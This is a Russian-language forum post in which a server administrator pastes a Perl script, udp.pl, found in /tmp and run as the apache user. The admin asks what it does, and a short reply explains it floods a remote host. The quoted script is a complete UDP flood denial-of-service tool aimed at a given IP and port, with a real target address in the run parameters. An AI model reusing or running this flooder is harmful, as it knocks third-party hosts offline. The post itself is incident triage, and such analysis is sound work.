>У себя на серваке в папке /tmp/ нашел странный скриптик udp.pl >Спецы перла, скажите для чего он используется? >Какие есть методы защиты от проникновения такого в папку тпм? > >был запущен от пользователя apache с параметрами 88.158.99.2 80 0 > > >Вот содержимое: > >code:--------------------------------------------------------------------------------bash-3.00$ cat /tmp/udp.pl >#!/usr/bin/perl >################################################### >################ UDP ATACK FLOOD ################## >################################################### > >use Socket; > >$ARGC=@ARGV; > >if ($ARGC !=3) { > printf " \n"; > printf "-------UDP ATACK FLOOD-------\n"; > printf "EX: $0 <ip> <port> <time>\n"; > printf "-----------------------------\n"; > printf " \n"; > exit(1); >} > >my ($ip,$port,$size,$time); > $ip=$ARGV[0]; > $port=$ARGV[1]; > $time=$ARGV[2]; > >socket(crazy, PF_INET, SOCK_DGRAM, 17); > $iaddr = inet_aton("$ip"); > >printf " \n"; >printf "-------UDP ATACK FLOOD-------\n"; >printf "Seding flood: $ip:$port\n"; >printf "-----------------------------\n"; >printf " \n"; > >if ($ARGV[1] ==0 && $ARGV[2] ==0) { > goto randpackets; >} >if ($ARGV[1] !=0 && $ARGV[2] !=0) { > system("(sleep $time;killall -9 udp) &"); > goto packets; >} >if ($ARGV[1] !=0 && $ARGV[2] ==0) { > goto packets; >} >if ($ARGV[1] ==0 && $ARGV[2] !=0) { > system("(sleep $time;killall -9 udp) &"); > goto randpackets; >} > >packets: >for (;;) { > $size=$rand x $rand x $rand; > send(crazy, 0, $size, sockaddr_in($port, $iaddr)); >} > >randpackets: >for (;;) { > $size=$rand x $rand x $rand; > $port=int(rand 65000) +1; > send(crazy, 0, $size, sockaddr_in($port, $iaddr)); > -------------------------------------------------------------------------------- бомбит пакетами размера $size,удаленный хост $ip
|